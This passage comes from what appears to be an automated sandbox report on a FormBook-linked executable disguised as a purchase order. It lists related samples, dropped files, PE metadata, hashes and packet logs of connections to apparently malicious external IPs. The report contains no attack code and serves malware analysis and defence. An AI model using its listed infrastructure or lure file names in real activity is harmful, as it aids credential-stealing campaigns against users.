                                                                                                                          • 67.223.117.169
                                                                                                                          dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.117.169
                                                                                                                          PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.117.142
                                                                                                                          shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.117.142
                                                                                                                          fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.118.17
                                                                                                                          New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 67.223.117.142

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO -2025918.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\PO -2025918.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1216
                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                          Malicious:true
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1172
                                                                                                                          Entropy (8bit):5.341568737517634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3fWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:PWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                                          MD5:CB6D24A0A9EF8E5A15EEC574E792E408
                                                                                                                          SHA1:F2353102BA5667F531152CCC1F3E9699746BCFAE
                                                                                                                          SHA-256:44EA1F747E32CBFE428809A9291FDE07F087EA3AF3C17486610EE00A9F8BB6C5
                                                                                                                          SHA-512:FD807769B19E21343FAEC5A7C1DD1C159EDAA8A5EC1EFC4E989B95552A6180476D83AC7E260E1CA28D5F2630A66A05474C38F4A42AD872E519DA04AE69A188F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e.................................3.(.......................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                          C:\Users\user\AppData\Local\Temp\-4108694

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0twen1au.jov.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_curnwszq.a2f.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fx50y0hm.cmp.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xct4qmlf.z35.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):7.749911144499192
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          File name:PO -2025918.exe
                                                                                                                          File size:782'336 bytes
                                                                                                                          MD5:cb01d48baf8a685f7f8233565e3cbfb7
                                                                                                                          SHA1:b205be3b958db2891cd2582131ed22d89b37bc07
                                                                                                                          SHA256:7365e206478fad792a4c64390b32e1d21b16a5c080a6215eba8498c638877f06
                                                                                                                          SHA512:4484f68435fabdf76538221678c0077307e3291b87a58b8f4b8da6112010a7670fd5d8c5f42d6357cb4adc3c252fd48b667c42e688aec9b865b0602e88b5dcb5
                                                                                                                          SSDEEP:12288:3fvYRxA4Y5lyA/BxSPCRJ30Qqfm0YktdjjKQU6cfMNvUeuZsVOJZP6qOKWm833:YRYJtEm6K33s47pOKW/3
                                                                                                                          TLSH:28F402113259D803C5A20BF02931D3B457B8AE99E921C7434FEA7EFFBEB67426644352
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..g..............0......&......r.... ........@.. .......................`............@................................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:f0aea8aaaa8ee80f

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x4be772
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6785C870 [Tue Jan 14 02:14:08 2025 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                          and dword ptr [eax], eax
                                                                                                                          inc eax
                                                                                                                          add byte ptr [ebx], ah
                                                                                                                          add byte ptr [eax+eax], ah
                                                                                                                          and eax, 26005E00h
                                                                                                                          add byte ptr [edx], ch
                                                                                                                          add byte ptr [eax], ch
                                                                                                                          add byte ptr [ecx], ch
                                                                                                                          add byte ptr [edi], bh
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [edx+003E9999h], bl
                                                                                                                          add byte ptr [eax], al
                                                                                                                          aas
                                                                                                                          int CCh
                                                                                                                          dec esp
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbe7200x4f.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x22d4.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc40000xc.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x20000xbc7a00xbc8003288438e11ebc1783b522df0a80c2baeFalse0.9192276608090185data7.75594454439522IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0xc00000x22d40x2400c38108cb3eab4b6befd519d90cfaf0e4False0.8772786458333334data7.375380220086768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0xc40000xc0x200bc50bb7cd00f1b79ce8e53be04fd2d40False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_ICON0xc00c80x1e50PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9755154639175257
                                                                                                                          RT_GROUP_ICON0xc1f280x14data1.05
                                                                                                                          RT_VERSION0xc1f4c0x384data0.43222222222222223

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                          Network Behavior

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 15, 2025 18:15:52.782568932 CET4974280192.168.2.413.248.169.48
                                                                                                                          Jan 15, 2025 18:15:52.787425995 CET804974213.248.169.48192.168.2.4
                                                                                                                          Jan 15, 2025 18:15:52.787602901 CET4974280192.168.2.413.248.169.48
                                                                                                                          Jan 15, 2025 18:15:52.802956104 CET4974280192.168.2.413.248.169.48
                                                                                                                          Jan 15, 2025 18:15:52.807761908 CET804974213.248.169.48192.168.2.4
                                                                                                                          Jan 15, 2025 18:15:58.465424061 CET804974213.248.169.48192.168.2.4
                                                                                                                          Jan 15, 2025 18:15:58.465533018 CET804974213.248.169.48192.168.2.4
                                                                                                                          Jan 15, 2025 18:15:58.465615034 CET804974213.248.169.48192.168.2.4
                                                                                                                          Jan 15, 2025 18:15:58.465841055 CET4974280192.168.2.413.248.169.48
                                                                                                                          Jan 15, 2025 18:15:58.465867996 CET4974280192.168.2.413.248.169.48
                                                                                                                          Jan 15, 2025 18:15:58.469461918 CET4974280192.168.2.413.248.169.48
                                                                                                                          Jan 15, 2025 18:15:58.474673033 CET804974213.248.169.48192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:08.518908978 CET4983980192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:08.523756981 CET8049839188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:08.523828030 CET4983980192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:08.537873030 CET4983980192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:08.543090105 CET8049839188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:09.264993906 CET8049839188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:09.265974998 CET8049839188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:09.266021967 CET4983980192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:09.266716957 CET8049839188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:09.266757011 CET4983980192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:10.047470093 CET4983980192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:11.067284107 CET4985880192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:11.072181940 CET8049858188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:11.072614908 CET4985880192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:11.093838930 CET4985880192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:11.098812103 CET8049858188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:11.730663061 CET8049858188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:11.730699062 CET8049858188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:11.730746984 CET4985880192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:11.730992079 CET8049858188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:11.731039047 CET4985880192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:12.609909058 CET4985880192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:13.628917933 CET4987680192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:13.633896112 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.634001017 CET4987680192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:13.650338888 CET4987680192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:13.655215979 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655226946 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655257940 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655275106 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655343056 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655353069 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655384064 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655391932 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:13.655426025 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:14.310547113 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:14.310611963 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:14.310667992 CET4987680192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:14.311599016 CET8049876188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:14.311654091 CET4987680192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:15.156816959 CET4987680192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:16.176906109 CET4989280192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:16.181806087 CET8049892188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:16.181941032 CET4989280192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:16.193290949 CET4989280192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:16.198187113 CET8049892188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:16.860996008 CET8049892188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:16.861011028 CET8049892188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:16.861203909 CET4989280192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:16.862323999 CET8049892188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:16.862410069 CET4989280192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:16.863877058 CET4989280192.168.2.4188.114.97.3
                                                                                                                          Jan 15, 2025 18:16:16.868678093 CET8049892188.114.97.3192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.142683029 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.147686958 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.147772074 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.163305044 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.168297052 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.759963989 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.759979963 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.759990931 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760009050 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760019064 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760029078 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760032892 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.760039091 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760049105 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760059118 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760070086 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.760077953 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.760104895 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.760122061 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.764921904 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.764935970 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.764945984 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.764955044 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.764983892 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.765006065 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.765188932 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.812944889 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.846657038 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846709013 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846719027 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846821070 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.846857071 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846873045 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846883059 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846894026 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846904993 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.846920967 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.846945047 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.846970081 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.847618103 CET804998067.223.117.189192.168.2.4
